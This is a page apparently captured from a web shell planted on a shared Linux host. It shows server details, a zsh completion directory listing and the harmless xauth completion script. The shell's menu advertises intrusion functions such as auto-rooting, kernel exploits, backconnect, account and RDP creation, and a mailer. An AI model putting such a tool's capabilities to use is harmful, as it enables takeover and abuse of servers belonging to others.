Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.13
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
zsh /
functions /
Completion /
X /
[ HOME SHELL ]
Name
Size
Permission
Action
_acroread
3.42
KB
-rw-r--r--
_code
2.54
KB
-rw-r--r--
_dcop
2.88
KB
-rw-r--r--
_eog
1.26
KB
-rw-r--r--
_evince
1.61
KB
-rw-r--r--
_geany
1.97
KB
-rw-r--r--
_gnome-gv
139
B
-rw-r--r--
_gqview
619
B
-rw-r--r--
_gv
1.28
KB
-rw-r--r--
_kdeconnect
1.87
KB
-rw-r--r--
_kfmclient
3.19
KB
-rw-r--r--
_matlab
1.4
KB
-rw-r--r--
_mozilla
4.67
KB
-rw-r--r--
_mplayer
8.15
KB
-rw-r--r--
_mupdf
733
B
-rw-r--r--
_nautilus
538
B
-rw-r--r--
_nedit
2.8
KB
-rw-r--r--
_netscape
2.87
KB
-rw-r--r--
_okular
332
B
-rw-r--r--
_pdftk
1.34
KB
-rw-r--r--
_qiv
3.9
KB
-rw-r--r--
_rdesktop
3.71
KB
-rw-r--r--
_setxkbmap
2.54
KB
-rw-r--r--
_sublimetext
605
B
-rw-r--r--
_urxvt
2.76
KB
-rw-r--r--
_vnc
4.06
KB
-rw-r--r--
_x_arguments
600
B
-rw-r--r--
_x_borderwidth
125
B
-rw-r--r--
_x_color
1007
B
-rw-r--r--
_x_colormapid
396
B
-rw-r--r--
_x_cursor
409
B
-rw-r--r--
_x_display
75
B
-rw-r--r--
_x_extension
484
B
-rw-r--r--
_x_font
286
B
-rw-r--r--
_x_geometry
125
B
-rw-r--r--
_x_keysym
615
B
-rw-r--r--
_x_locale
120
B
-rw-r--r--
_x_modifier
153
B
-rw-r--r--
_x_name
116
B
-rw-r--r--
_x_resource
124
B
-rw-r--r--
_x_selection_timeout
130
B
-rw-r--r--
_x_title
118
B
-rw-r--r--
_x_utils
6.33
KB
-rw-r--r--
_x_visual
272
B
-rw-r--r--
_x_window
402
B
-rw-r--r--
_xauth
2.52
KB
-rw-r--r--
_xautolock
631
B
-rw-r--r--
_xclip
1.03
KB
-rw-r--r--
_xdvi
1.66
KB
-rw-r--r--
_xfig
1.93
KB
-rw-r--r--
_xft_fonts
1.32
KB
-rw-r--r--
_xloadimage
3.81
KB
-rw-r--r--
_xmodmap
2.22
KB
-rw-r--r--
_xournal
126
B
-rw-r--r--
_xpdf
1.72
KB
-rw-r--r--
_xrandr
2.61
KB
-rw-r--r--
_xscreensaver
823
B
-rw-r--r--
_xset
5.08
KB
-rw-r--r--
_xt_arguments
1.7
KB
-rw-r--r--
_xt_session_id
40
B
-rw-r--r--
_xterm
1.19
KB
-rw-r--r--
_xv
2.43
KB
-rw-r--r--
_xwit
4.63
KB
-rw-r--r--
_zeal
1.33
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : _xauth
#compdef xauth local state context line expl ret=1 typeset -A opt_args local tmp cmd _arguments -s \ '-f[specify authfile]:authfile:_files' \ '(-q)-v[verbose mode]' \ '(-v)-q[quiet mode]' \ '-b[break locks]' \ '-i[ignore locks]' \ '*::command:->command' && ret=0 while [[ -n "$state" ]]; do tmp="$state" state= case "$tmp" in command) if (( CURRENT == 1 )); then state=subcommands else cmd="$words[1]" curcontext="${curcontext%:*:*}:xauth-${cmd}:" case "$cmd" in add) _arguments \ ':display name:->displayname' \ ':protocol name:->protocolname' \ ':hexkey:' && ret=0 ;; generate) if (( CURRENT == 2 )); then state=displayname elif (( CURRENT == 3 )); then state=protocolname else case "$words[CURRENT-1]" in timeout) _message -e values 'timeout (seconds)';; group) _message -e ids 'group-id';; data) _message -e values 'hexdata';; *) _wanted options expl 'xauth generate options' \ compadd trusted untrusted timeout group data && ret=0 ;; esac fi ;; extract|nextract) case "$CURRENT" in 2) _wanted files expl 'filename to write auth data' _files && ret=0;; *) state=displayname;; esac ;; list|nlist) state=displayname ;; merge|nmerge) _wanted files expl 'filename to read auth data' _files && ret=0 ;; remove) state=displayname ;; source) _wanted files expl 'filename to source' _files && ret=0 ;; info|exit|quit|\?) ;; help) state=subcommands ;; esac fi ;; subcommands) tmp=( 'add:add entry' 'generate:use server to generate entry' 'extract:extract entries into file' 'nextract:numerically extract entries' 'list:list entries' 'nlist:numerically list entries' 'merge:merge entries from files' 'nmerge:numerically merge entries' 'remove:remove entries' 'source:read commands from file' 'info:print information about entries' 'exit:save changes and exit program' 'quit:abort changes and exit program' 'help:print help' '?:list available commands' ) _describe 'xauth command' tmp -- && ret=0 ;; protocolname) _wanted values expl 'authorization protocol' \ compadd MIT-MAGIC-COOKIE-1 XDM-AUTHORIZATION-1 SUN-DES-1 MIT-KERBEROS-5 && ret=0 ;; displayname) { _wanted values expl 'display name' \ compadd - ${${(f)"$(xauth list)"}%% *} || _x_display } && ret=0 ;; esac done return ret
Close